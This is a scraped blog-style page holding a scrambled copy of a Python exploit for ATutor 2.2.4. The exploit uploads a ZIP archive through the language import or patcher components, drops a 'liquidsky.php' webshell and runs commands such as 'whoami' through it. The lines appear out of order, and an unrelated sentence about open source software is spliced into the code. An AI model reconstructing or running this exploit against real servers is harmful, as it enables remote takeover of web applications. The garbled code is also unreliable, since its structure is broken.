# Note be sure to clean up: c:\xampp\htdocs\liquidsky.php and or /var/An open source software is often developed in a public, collaborative manner. Print " + target + "/liquidsky.php?language=" + commands Request = s.post(url, headers=headers, data=data, verify=False) # url = " + target + "/ATutor/mods/_standard/patcher/index_admin.php" # A similar method works for the "patcher" function. Url = " + target + "/ATutor/mods/_core/languages/language_import.php" Targeturl = " + target + "/ATutor/login.php" Shell = " + target + "/liquidsky.php?language=" + commands # Note: This was successfully tested against a windows install however it should work with linux. "Referer": " + target + "/ATutor/mods/_core/languages/language_import.php", Print "- Example: %s admin mypassword 'whoami'" % sys.argv Print "- Discovery / PoC by liquidsky (JMcPeters) ^^" Print "- ATutor 2.2.4 Arbitrary File Upload / RCE " # Notes: This application is no longer being maintained so there is no fix for this issue. # resulting in remote code execution via a "." pathname in a ZIP archive to the mods/_core/languages/language_import.php (aka Import New Language) or mods/_standard/patcher/index_admin.php (aka Patcher) component. # Description: ATutor 2.2.4 allows Arbitrary File Upload and Directory Traversal # Tested on: Windows 8 / Apache / MySQL (XAMPP) # Exploit Title: ATutor 2.2.4 'language_import' Arbitrary File Upload / RCE Change Mirror Download #!/usr/bin/env python
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |